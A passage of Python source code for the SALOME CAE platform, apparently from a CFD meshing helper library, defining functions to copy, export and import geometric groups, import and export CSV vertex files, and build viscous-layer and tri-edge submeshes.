face_1_linking_edges.append(edge)
#-
# Get the target face
face_1_target_face = None
nb_face_1_linking_edges = len(face_1_linking_edges)
for face_2 in face_compound2[2]:
nb_contact = 0
for face_1_linking_edge in face_1_linking_edges:
min_distance = geompy.MinDistance(face_1_linking_edge, face_2)
if min_distance <= tol:
nb_contact += 1
if nb_contact == nb_face_1_linking_edges:
face_1_target_face = face_2
break
#-
# Create the linking fillings
face_1_linking_fillings = []
face_1_edges = geompy.SubShapeAll(face_1, geompy.ShapeType["EDGE"])
face_1_target_face_edges = geompy.SubShapeAll(face_1_target_face, geompy.ShapeType["EDGE"])
for face_1_edge in face_1_edges:# For each edge of the face 1...
# Get the linking edges
face_1_edge_linking_edges = []
for face_1_linking_edge in face_1_linking_edges:
min_distance = geompy.MinDistance(face_1_linking_edge, face_1_edge)
if min_distance <= tol:
face_1_edge_linking_edges.append(face_1_linking_edge)
#-
# Get the target edge
face_1_edge_target_edge = None
for face_1_target_face_edge in face_1_target_face_edges:
nb_contact = 0
for face_1_edge_linking_edge in face_1_edge_linking_edges:
min_distance = geompy.MinDistance(face_1_edge_linking_edge, face_1_target_face_edge)
if min_distance <= tol:
nb_contact += 1
if nb_contact == 2:
face_1_edge_target_edge = face_1_target_face_edge
#-
# Create the filling edge compound
filling_edge_compound = geompy.MakeCompound([face_1_edge, face_1_edge_target_edge])
#-
# Create the filling
face_1_linking_filling = geompy.MakeFilling(filling_edge_compound, theMethod = GEOM.FOM_AutoCorrect)
face_1_linking_fillings.append(face_1_linking_filling)
#-
#-
# Create the compound
face_1_shell = geompy.MakeShell([face_1, face_1_target_face] + face_1_linking_fillings)
#-
if dim == 2:
shapes_to_return.append(face_1_shell)
else:
# Sew the shell
sewing_tolerance = tol
while True:
free_boundaries = geompy.GetFreeBoundary(face_1_shell)[1]
if len(free_boundaries) == 0:
break
face_1_shell = geompy.MakeGlueEdges(face_1_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
face_1_shell = geompy.MakeShell([face_1_shell])
face_1_solid = geompy.MakeSolid([face_1_shell])
solids.append(face_1_solid)
#-
#-
if dim == 2:
if add == True:
AddToStudy(shapes_to_return, "LinkingSolids (Faces)")
return shapes_to_return
else:
# Put the solids into a compound
solids = geompy.MakeCompound(solids)
#-
# Glue faces
try:
solids = geompy.MakeGlueFaces(solids, tol)
except:
print "[*] The glue operation failed on the final shape."
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solids, "LinkingSolids")
return solids
#-
mls = MakeLinkingSolids
def CopyGeometricalGroups( shape1, shape2, only = [None], ignore = [None], type = None, tol = 1e-7, add = True ):
"""
Description:
Copies groups from a geometrical object to another according to the shape of group elements.
Arguments:
# shape1
Description: the source geometrical object.
Type: Any geometrical object
GUI selection: -
Selection by name: yes
Recursive: -
Default value: -
# shape2
Description: The target geometrical object.
Type: Any geometrical object
GUI selection: -
Selection by name: yes
Recursive: -
Default value: -
# only
Description: The list of names of groups to copy, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# type
Description: The type of groups to copy. Can equal "vertex", "edge", "face" or "solid".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Group
Number: n
Name: The name of the source group
Conditions of use:
The groups inside the source shape must have each one a different name.
"""
if add == True:
gg = salome.ImportComponentGUI("GEOM")
# Get the input shape(s)
[shape1, shape2] = GetObject([shape1, shape2])
#-
# Check the input shape existence
if "error" in [shape1, shape2] or None in [shape1, shape2]: return
#-
else:# All checks done
# Get the list of the IDs of all the shapes visible in the study tree
visible_ids = ListComponentShapes("GEOM", output = "ID")
#-
# Get the shape 1 groups
groups_1 = geompy.GetGroups(shape1)
visible_groups_1 = []
for group_1 in groups_1:
group_1_id = salome.ObjectToID(group_1)
if group_1_id in visible_ids:
visible_groups_1.append(group_1)
#-
# Sort the shape 1 groups
sorted_shape_groups_1 = []
if only != [None]:
for visible_group_1 in visible_groups_1:
visible_groups_name1 = visible_group_1.GetName()
if visible_groups_name1 in only:
sorted_shape_groups_1.append(visible_group_1)
visible_groups_1 = sorted_shape_groups_1
sorted_shape_groups_1 = []
if ignore != [None]:
for visible_group_1 in visible_groups_1:
visible_groups_name1 = visible_group_1.GetName()
if visible_groups_name1 not in ignore:
sorted_shape_groups_1.append(visible_group_1)
visible_groups_1 = sorted_shape_groups_1
sorted_shape_groups_1 = []
if type != None:
for visible_group_1 in visible_groups_1:
visible_group_type1 = str(visible_group_1.GetMaxShapeType())
if visible_group_type1 == type.upper():
sorted_shape_groups_1.append(visible_group_1)
visible_groups_1 = sorted_shape_groups_1
#-
# Get the shape 2 groups
groups_2 = geompy.GetGroups(shape2)
visible_groups_2 = []
for group_2 in groups_2:
group_2_id = salome.ObjectToID(group_2)
if group_2_id in visible_ids:
visible_groups_2.append(group_2)
#-
# Get the shape 2 group names
visible_group_names_2 = [visible_group_2.GetName() for visible_group_2 in visible_groups_2]
#-
new_groups_2 = []
for visible_group_1 in visible_groups_1:# For each of these groups...
# Get the group name
visible_group_1_name = visible_group_1.GetName()
#-
# Get the group type
visible_group_1_type = str(visible_group_1.GetMaxShapeType())
#-
if visible_group_1_name in visible_group_names_2:# If the group already exists in the shape 2...
# Delete this group
i = 0
for visible_group_name_2 in visible_group_names_2:
if visible_group_1_name == visible_group_name_2:
try:
salome.geom.geomtools.GeomStudyTools().deleteShape(salome.ObjectToID(visible_groups_2[i]))
except:
pass
break
i += 1
# Create the shape 2 group
new_group_2 = geompy.CreateGroup(shape2, geompy.ShapeType[visible_group_1_type])
#if strict == False:
try:
new_group_2 = geompy.GetInPlace(shape2, visible_group_1)
except:
new_group_2 = None
#else:
#try:
#shape2MatchedSubShapes = geompy.GetSharedShapes(shape2, visible_group_1, geompy.ShapeType[visible_group_1_type])
#for shape2_matched_sub_shape in shape2_matched_sub_shapes:
#shape2MatchedSubShapeID = geompy.GetSubShapeID(shape2, shape2_matched_sub_shape)
#geompy.AddObject(new_group_2, shape2_matched_sub_shape_id)
#except:
#new_group_2 = None
#-
# Add the group to the list
new_groups_2.append(new_group_2)
#-
# Add the group to the study
if new_group_2 != None:
if add == True:
try:
id = geompy.addToStudyInFather(shape2, new_group_2, visible_group_1_name)
gg.createAndDisplayGO(id)
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
except:
pass
#-
#-
# Return the resulting shape(s)
return new_groups_2
#-
salome.sg.updateObjBrowser(1)
cgg = CopyGeometricalGroups
def ExportGeometricalGroups( shape = None, file = "cfdmsh_grps", only = [None], ignore = [None], type = None ):
"""
Description:
Exports into a file the geometrical groups of a geometrical object in the form of sets of subshape IDs.
Arguments:
# shape
Description: The source geometrical object.
Type: Any geometrical object
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name of the file to write.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_grps"
# only
Description: The list of names of groups to export, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# type
Description: Type of groups to export. Can equal "vertex", "edge", "face" or "solid".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
shape = GetGUISelection(shape, uniq = True)
shape = GetObject(shape)
#-
# Check the input shape existence
if "error" in [shape] or None in [shape]: return
#-
else:# All checks done
# Get the list of the IDs of all the shapes visible in the study tree
visible_ids = ListComponentShapes("GEOM", output = "ID")
#-
# Open the group file
group_file = open(file, "w")
#-
# Get the groups
shape_groups = geompy.GetGroups(shape)
visible_shape_groups = []
for shape_group in shape_groups:
shape_group_id = salome.ObjectToID(shape_group)
if shape_group_id in visible_ids:
visible_shape_groups.append(shape_group)
#shapeGroups = geompy.GetGroups(shape)
#-
# Sort the groups
sorted_shape_groups = []
if only != [None]:
for visible_group in visible_shape_groups:
visible_shape_groups_name = visible_group.GetName()
if visible_shape_groups_name in only:
sorted_shape_groups.append(visible_group)
visible_shape_groups = sorted_shape_groups
sorted_shape_groups = []
if ignore != [None]:
for visible_group in visible_shape_groups:
visible_shape_groups_name = visible_group.GetName()
if visible_shape_groups_name not in ignore:
sorted_shape_groups.append(visible_group)
visible_shape_groups = sorted_shape_groups
sorted_shape_groups = []
if type != None:
for visible_group in visible_shape_groups:
visible_group_type = str(visible_group.GetMaxShapeType())
if visible_group_type == type.upper():
sorted_shape_groups.append(visible_group)
visible_shape_groups = sorted_shape_groups
#-
# Write the group file
for visible_shape_group in visible_shape_groups:
# Get the name of groups
group_name = visible_shape_group.GetName()
#-
if group_name != "":
# Write the name of groups
group_file.write("%s\n"%(group_name))
#-
# Get the type of group
nb_solids = geompy.NbShapes(visible_shape_group, geompy.ShapeType["SOLID"])
nb_faces = geompy.NbShapes(visible_shape_group, geompy.ShapeType["FACE"])
nb_edges = geompy.NbShapes(visible_shape_group, geompy.ShapeType["EDGE"])
nb_vertexes = geompy.NbShapes(visible_shape_group, geompy.ShapeType["VERTEX"])
if nb_solids > 0:
group_type = geompy.ShapeType["SOLID"]
elif nb_faces > 0:
group_type = geompy.ShapeType["FACE"]
elif nb_edges > 0:
group_type = geompy.ShapeType["EDGE"]
elif nb_vertexes > 0:
group_type = geompy.ShapeType["VERTEX"]
#-
# Write the type of groups
group_file.write("%s\n"%(group_type))
#-
# Get the IDs of groups
group_sub_shapes = geompy.SubShapeAll(visible_shape_group, group_type)
#-
# Write the IDs of groups
for sub_shape in group_sub_shapes:
sub_shape_id = geompy.GetSubShapeID(shape, sub_shape)
group_file.write("%s\t"%(sub_shape_id))
#-
group_file.write("\n")
#-
# Close the group file
group_file.close()
#-
egg = ExportGeometricalGroups
def ImportGeometricalGroups( shape = None, file = "cfdmsh_grps", only = [None], ignore = [None], type = None, add = True ):
"""
Description:
Imports from a file created with the ExportGeometricalGroups function into a geometrical object groups in the form of sets of subshape IDs.
Arguments:
# shape
Description: The target geometrical object.
Type: Any geometrical object
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name of the file to read.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_grps"
# only
Description: The list of names of groups to export, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# type
Description: Type of groups to export. Can equal "vertex", "edge", "face" or "solid".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: Group
Number: n
Name: The name of the group in the file
Conditions of use:
-
"""
if add == True: gg = salome.ImportComponentGUI("GEOM")
# Get the input shape(s)
shape = GetGUISelection(shape, uniq = True)
shape = GetObject(shape)
#-
# Check the input shape existence
if "error" in [shape] or None in [shape]: return
#-
else:# All checks done
# Get the list of the IDs of all the shapes visible in the study tree
visible_ids = ListComponentShapes("GEOM", output = "ID")
#-
# Get the already existing groups
#oldGroups = geompy.GetGroups(shape)
old_groups = geompy.GetGroups(shape)
visible_old_groups = []
for old_group in old_groups:
old_group_id = salome.ObjectToID(old_group)
if old_group_id in visible_ids:
visible_old_groups.append(old_group)
#-
# Get the already existing group names
visible_old_group_names = [visible_old_group.GetName() for visible_old_group in visible_old_groups]
#-
# Open the group file
group_file = open(file, "r")
#-
# Import the groups
i = 0
for line in group_file:
line = line[:-1]# Delete ending "\n"
# Get the group name
if i == 0:
group_name = line
#-
# Get the group type and create or get the group
if i == 1:
group_type = int(line)
############
############
############
pass_group = False
if only != [None] and group_name not in only:
pass_group = True
if ignore != [None] and group_name in ignore:
pass_group = True
if type != None and group_type != geompy.ShapeType[type.upper()]:
pass_group = True
############
############
############
if pass_group == False:
if group_name in visible_old_group_names:# If the group already exists...
# Get the already existing group
j = 0
for visible_old_group_name in visible_old_group_names:
if group_name == visible_old_group_name:
try:
salome.geom.geomtools.GeomStudyTools().deleteShape(salome.ObjectToID(visible_old_groups[j]))
except:
pass
break
j += 1
#-
# Create the new group
new_group = geompy.CreateGroup(shape, group_type)
#-
#-
#-Get the IDs and add them to the new group
if i == 2:
if pass_group == False:
shape_ids = line.split()
for shape_id in shape_ids:
geompy.AddObject(new_group, int(shape_id))
if add == True:
id = geompy.addToStudyInFather(shape, new_group, group_name)
gg.createAndDisplayGO(id)
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
#-
i += 1
if i == 3:
i = 0
#-
# Close the group file
group_file.close()
#-
igg = ImportGeometricalGroups
def PutAllSubShapesInAGroup( dim, shape = None, add = True, infa = True ):
"""
Description:
Create a geometrical group containing all sub-shapes of a given dimension.
Arguments:
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# shape
Description: The source shape.
Type: Any geometrical object
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: 0
"single" value: -
Type: Group of Vertexes
Number: 1
Name: "AllSubShapes (Vertexes)"
"dim" value: 1
"single" value: -
Type: Group of Edges
Number: 1
Name: "AllSubShapes (Edges)"
"dim" value: 2
"single" value: -
Type: Group of Faces
Number: 1
Name: "AllSubShapes (Faces)"
"dim" value: 3
"single" value: -
Type: Group of Solids
Number: 1
Name: "AllSubShapes (Solids)"
Conditions of use:
-
"""
if dim not in [0, 1, 2, 3]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shape = GetGUISelection(shape)
shape = GetObject(shape)
#-
# Make this function recursive
if isinstance(shape, list):
return_list = []
for sub_object in shape:
return_list.append(PutAllSubShapesInAGroup(dim, sub_object, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [shape] or None in [shape]: return
#-
# Set father object
father = None
if infa == True: father = shape
#-
if False: pass
else:# All checks done
# Get the group type
if dim == 0: group_type = geompy.ShapeType["VERTEX"]
if dim == 1: group_type = geompy.ShapeType["EDGE"]
if dim == 2: group_type = geompy.ShapeType["FACE"]
if dim == 3: group_type = geompy.ShapeType["SOLID"]
#-
# Create the group
group = geompy.CreateGroup(shape, group_type)
#-
# Get the sub - shape IDs
sub_shape_ids = geompy.SubShapeAllIDs(shape, group_type)
#-
# Add the sub-shapes in the group
for sub_shape_id in sub_shape_ids:
geompy.AddObject(group, sub_shape_id)
#-
# Publish the group
if add == True:
if dim == 0: geompy.addToStudyInFather(father, group, "AllSubShapes (Vertexes)")
if dim == 1: geompy.addToStudyInFather(father, group, "AllSubShapes (Edges)")
if dim == 2: geompy.addToStudyInFather(father, group, "AllSubShapes (Faces)")
if dim == 3: geompy.addToStudyInFather(father, group, "AllSubShapes (Solids)")
# Update the study tree
salome.sg.updateObjBrowser(1)
#-
return group
#-
passiag = PutAllSubShapesInAGroup
def SetRandomColors( ):
"""
Description:
Applies random colors on selected shapes in the Geometry module's 3D windows.
On mesh groups and sub-meshes, the coloration takes effect only if the input objects were not displayed yet. Else, the mesh has to be cleared and computed again.
Arguments:
# -
Description: -
Type: -
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
This functions works only when used from the GUI.
"""
gg = salome.ImportComponentGUI("GEOM")
# Get selected objects
selected_object_ids = salome.sg.getAllSelected()
nb_selected_objects = len(selected_object_ids)
selected_objects = []
for selected_object_id in selected_object_ids:
selected_objects.append(salome.myStudy.FindObjectID(selected_object_id).GetObject())
#-
# Define colors
colors = [\
[255, 0, 0], \
[0, 0, 255], \
[0, 255, 0], \
[0, 255, 255], \
[255, 0, 128], \
[255, 128, 0], \
[255, 255, 0], \
[235, 235, 235], \
[20, 20, 20], \
[255, 0, 255], \
[255, 128, 128], \
[128, 255, 128], \
[0, 128, 255], \
[255, 255, 128], \
[255, 128, 255], \
[128, 255, 255], \
[128, 0, 255], \
[0, 255, 128], \
[128, 128, 255], \
[128, 255, 0], \
[128, 128, 128], \
]
nb_colors = len(colors)
#-
# Define random colors if necessary
for i in range(nb_selected_objects - nb_colors):
color = []
for i in range(3):
color.append(int(random.random() * 255))
colors.append(color)
#-
colors.reverse()
#random.shuffle(colors)
# Set color of selected objects
for i in range(nb_selected_objects):
color = colors.pop()
selected_object = selected_objects[i]
if "<SMESH." in str(selected_object):
try:
selected_object.SetColor(SALOMEDS.Color(color[0] / 255.0, color[1] / 255.0, color[2] / 255.0))
except:
pass
if "<GEOM." in str(selected_object):
gg.setColor(selected_object_ids[i], color[0], color[1], color[2])
#-
src = SetRandomColors
def ExportCSVFile( compound = None, file = None, head = True ):
"""
Description:
Exports a 3D vertex compound into a CSV file.
Arguments:
# compound
Description: The vertex compound to export.
Type: Compound of Vertexes
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name of the file to write.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# head
Description: Defines if the function has to write a header to the file.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
input_shape = compound
# Get the input shape(s)
input_shape = GetGUISelection(input_shape)
input_shape = GetObject(input_shape)
#-
# Check the input shape existence
if "error" in [input_shape] or None in [input_shape]: return
#-
compound = input_shape
if False: pass
else:# All checks done
# Get vertexes
vertexes = GetSubShapes(compound)[0]
#-
# Get the file name
if file == None:
file = compound.GetName()
#-
# Export them in the CSV file
with open(file, "wb") as csvfile:
writer = csv.writer(csvfile, quoting = csv.QUOTE_NONNUMERIC)
if head == True:
writer.writerow(["X","Y","Z"])
for vertex in vertexes:
writer.writerow(geompy.PointCoordinates(vertex))
#-
ecf = ExportCSVFile
def ImportCSVFile( file, single = True, add = True ):
"""
Description:
Imports a CSV file describing a 3D set of vertexes.
Arguments:
# file
Description: The name of the file to read.
Type: String
GUI selection: -
Selection by name: -
Recursive: yes
Default value: -
# single
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
Returned Values:
"dim" value: -
"single" value: False
Type: Vertex
Number: n
Name: "VertexFromCSVFile"
"dim" value: -
"single" value: True
Type: Compound of Vertexes
Number: 1
Name: "VertexesFromCSVFile"
Conditions of use:
-
"""
# Make this function recursive
if isinstance(file, list):
return_list = []
for sub_object in file:
return_list.append(ImportCSVFile(sub_object, single, add))
return return_list
#-
if False: pass
else:# All checks done
# Put the CSV file into a list of lines
file_line_list = []
with open(file, "r") as opened_file:
for line in opened_file:
if not line.isspace():
file_line_list.append(line)
#-
# Get the separator
separator_list = [",", ";", "\t", "|", "^"]
right_separator = ""
right_nb_columns = 0
# for separator in separator_list:
#
# separator_found = True
#
# nb_columns = 0
#
# this_was_first_line = True
# for line in file_line_list:
#
# split_line = line.split(separator)
# if not this_was_first_line:
# if len(split_line) != nb_columns or len(split_line) <= 1:
# separator_found = False
# break
#
# nb_columns = len(split_line)
#
# this_was_first_line = False
#
#
# if separator_found:
#
# right_separator = separator
# right_nb_columns = nb_columns
#
# if right_separator == "":
#
# print "[X] The CSV file separator could not be determined. Please, use one of these separator characters: , ; | ^ tab"
# return
#
# else:
#
# separator = right_separator
# nb_columns = right_nb_columns
#
#
# #-
#
# # Check the number of columns
#
# if nb_columns not in [2, 3]:
# print "[X] The CSV file should contain a number of columns between two and three."
# return
#
#
#-
# Import the vertexes from the CSV file
vertex_list = []
for line in file_line_list:
split_line = line.split(",")
try:
x = float(split_line[0])
except:
continue
try:
y = float(split_line[1])
except:
continue
if len(split_line) == 3:
try:
z = float(split_line[2])
except:
continue
else:
z = 0.0
vertex = geompy.MakeVertex(x, y, z)
vertex_list.append(vertex)
#-
to_return = vertex_list
to_return_name = "VertexFromCSVFile"
if single == True:
compound = geompy.MakeCompound(vertex_list)
to_return = compound
to_return_name = "VertexesFromCSVFile"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
icf = ImportCSVFile
def MakeVirtualOffsetEdgeSubmeshes( thick_and_size, group_and_mesh = [None], np = 40, curv = True, rev = False, add = True, infa = False, dim = -1 ):
"""
Description:
Creates submeshes on an edge group so as to prepare it for automatic viscous layer meshing.
Arguments:
# thick_and_size
Description: The desired viscous layer thickness and the desired cell size along the edge.
Type: List of 2 Floats
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# group_and_mesh
Description: The input group and the mesh in which to create sub-meshes.
Type: List of1 Group of Edges + 1 Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 40
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: -1
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 1
Name: "VirtualOffset"
"dim" value: -1
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
if dim not in [-1, 0, 1]: print "[X] There is no shape to return corresponding to the given dimension."; return
if not isinstance(thick_and_size, list):
print "[X] The first argument (thick_and_size) should be an array."; return
if not isinstance(group_and_mesh, list):
print "[X] The second argument (group_and_mesh) should be an array."; return
if len(thick_and_size) != 2:
print "[X] The first argument (thick_and_size) should have exactly two elements."; return
input_shapes = group_and_mesh
# Get the input shape(s)
input_shapes = GetGUISelection(input_shapes)
input_shapes = GetObject(input_shapes, "GEOM", silent = True) + GetObject(input_shapes, "SMESH", silent = True)
#-
# Distinguish input shapes
group = None
mesh = None
for object in input_shapes:
if "GEOM_Object instance" in str(object): group = object
if "SMESH_Mesh instance" in str(object) or "meshProxy instance" in str(object) or "Mesh object" in str(object): mesh = object
if None in [group, mesh]:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."; return
#-
# Set father object
father = None
if infa == True: father = group
#-
if False: pass
else:# All checks done
# Get input objects
[dist, step] = thick_and_size
try:
mesh = smesh.Mesh(mesh)
except:
pass
main_shape = group.GetMainShape()
if main_shape == None:
print "[X] The input group has no parent shape."; return
group_name = group.GetName()
group_vertexes = GetSubShapes(group)[0]
#-
# Check if the group is "wire-shaped"
group_edge_list = GetSubShapes(group)[1]
try:
group_wire = geompy.MakeWire(group_edge_list)
except:
print "[X] The input group should be \"wire-shaped\"."; return
#-
# Make wire edge offsets
if rev == True:
dist *= -1
offsets = MakePlanarWireOffset(dist, group_wire, np = np, curv = curv, simple = True, single = False, add = False)
edges = GetReorderedEdges(group_wire, add = False)
#-
if dim == 1:
compound = geompy.MakeCompound(offsets)
to_return = compound
to_return_name = "VirtualOffset"
else:
whole_vertex_list = list(group_vertexes)
nb_edges = len(edges)
for i in range(nb_edges):# For each edge of the input group...
edge = edges[i]
offset = offsets[i]
offset_vertexes = GetSubShapes(offset)[0]
whole_vertex_list += offset_vertexes
# Get the number of steps
edge_length = geompy.BasicProperties(edge)[0]
offset_length = geompy.BasicProperties(offset)[0]
nb_steps = math.ceil(offset_length / step)
real_step = offset_length / nb_steps
#-
# Project offset vertexes on the edge
distance = real_step
projected_vertex_list = []
vertex_on_offset_list = []
while distance < offset_length - real_step / 2:
vertex_on_offset = geompy.MakeVertexOnCurveByLength(offset, distance)
vertex_on_offset_list.append(vertex_on_offset)
##############################
#projected_vertex = geompy.MakeProjection(vertex_on_offset, edge)# Not available on Salome 7.5.1
[x,y,z] = geompy.ClosestPoints(vertex_on_offset, edge)[1][3:6]
projected_vertex = geompy.MakeVertex(x, y, z)
##############################
projected_vertex_list.append(projected_vertex)
distance += real_step
#-
whole_vertex_list += projected_vertex_list
whole_vertex_list += vertex_on_offset_list
# Split the edge with projected vertexes
discretized_edge = geompy.MakePartition([edge], projected_vertex_list)
#-
# Reorder discretized edges
reordered_edges = GetReorderedEdges(discretized_edge, add = False)
nb_sub_edges = len(reordered_edges)
#-
if dim == -1:
# Publish the edge in the study tree
published_edge = geompy.GetInPlace(group, edge, theName = "SubEdge_" + str(i))
#-
if nb_sub_edges == 1:# If the edge was not discretized...
if dim == -1:
# Create a Nb. Segments sub-mesh
algo = mesh.Segment(geom = published_edge)
hypo = algo.NumberOfSegments(1)
mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
#-
else:# If the edge was discretized...
# Get the suitable Fixed Points 1D hypothesis parameters
parameter_list = []
total_distance = 0
for sub_edge in reordered_edges:
sub_edge_length = geompy.BasicProperties(sub_edge)[0]
parameter = (total_distance + sub_edge_length) / edge_length
parameter_list.append(parameter)
if len(parameter_list) == nb_sub_edges - 1:
break
total_distance += sub_edge_length
#-
if dim == -1:
# Create temporary mesh and Fixed Points 1D sub-mesh
tmp_mesh = smesh.Mesh(main_shape)
algo = tmp_mesh.Segment(geom = published_edge)
tmp_hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, [])
sub_mesh = tmp_mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
tmp_mesh.Compute()
#-
# Check if the edge is reversed
vertex_compound = MakeVertexesFromMeshGroup(sub_mesh, add = False)
projected_vertex_compound = geompy.MakeCompound(projected_vertex_list)
cut = geompy.MakeCut(vertex_compound, projected_vertex_compound)
nb_resting_vertexes = geompy.NumberOfSubShapes(cut, geompy.ShapeType["VERTEX"])
reversed_edges = []
if nb_resting_vertexes > 2:
reversed_edges = [published_edge]
#-
# Delete temporary geometrical shapes and mesh
#http://www.salome-platform.org/forum/forum_10/366900504#419952388
try:
so = salome.ObjectToSObject(vertex_compound)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
except:
pass
try:
so = salome.ObjectToSObject(tmp_mesh.GetMesh())
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
except:
pass
try:
so = salome.ObjectToSObject(tmp_hypo)
sb = salome.myStudy.NewBuilder()
sb.RemoveObjectWithChildren(so)
except:
pass
#-
# Create the final Fixed Points 1D sub-mesh
algo = mesh.Segment(geom = published_edge)
hypo = algo.FixedPoints1D(parameter_list, [1] * nb_sub_edges, reversed_edges)
mesh.GetSubMesh(published_edge, "VirtualOffsetSubmesh_" + str(i) + " on " + group_name)
#-
if dim == 0:
compound = geompy.MakeCompound(whole_vertex_list)
to_return = compound
to_return_name = "VirtualOffset (Vertexes)"
if dim >= 0:
if add == True:
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name, father)
return to_return
#-
else:
# Update the study tree
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
#-
mvoes = MakeVirtualOffsetEdgeSubmeshes
def MakeTriEdgeFaceSubmeshes( groups_and_mesh = None ):
"""
Description:
Creates quadrangle submeshes on tri-edge face groups (that can be create using the GetTriEdgeFaces function) and add base vertexes when possible.
Arguments:
# groups_and_mesh
Description: The input tri-edge face groups and the mesh in which to create sub-meshes.
Type: List ofGroups of 1 Face + 1 Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
groups_and_mesh = GetGUISelection(groups_and_mesh)
groups_and_mesh = GetObject(groups_and_mesh, "GEOM", silent = True) + GetObject(groups_and_mesh, "SMESH", silent = True)
#-
# Distinguish input shapes
mesh = None
groups = []
for object in groups_and_mesh:
if "SMESH_Mesh instance" in str(object) or "meshProxy instance" in str(object) or "Mesh object" in str(object): mesh = object
if "GEOM_Object instance" in str(object): groups.append(object)
if None in [mesh] or len(groups) == 0:
print "[X] The input objects are incorrect or the Mesh module was not yet loaded."; return
#-
else:# All checks done
try:
mesh = smesh.Mesh(mesh)
except:
pass
# Get the mesh main shape
main_shape = mesh.GetShape()
#-
# For each input group...
for group in groups:
# Get group edge
group_edges = geompy.SubShapeAll(group, geompy.ShapeType["EDGE"])
#-
# Keep only straight edges
straight_edges = []
for edge in group_edges:
edge_length = geompy.BasicProperties(edge)[0]
edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
min_edge_length = geompy.MinDistance(edge_vertexes[0], edge_vertexes[1])
if abs(edge_length - min_edge_length) < 1e-9:
straight_edges.append(edge)
#-
# Get the group vertexes
group_vertexes = geompy.SubShapeAll(group, geompy.ShapeType["VERTEX"])
#-
# Find the base vertex
base_vertex = None
for vertex in group_vertexes:
nb_touching_edges = 0
for edge in straight_edges:
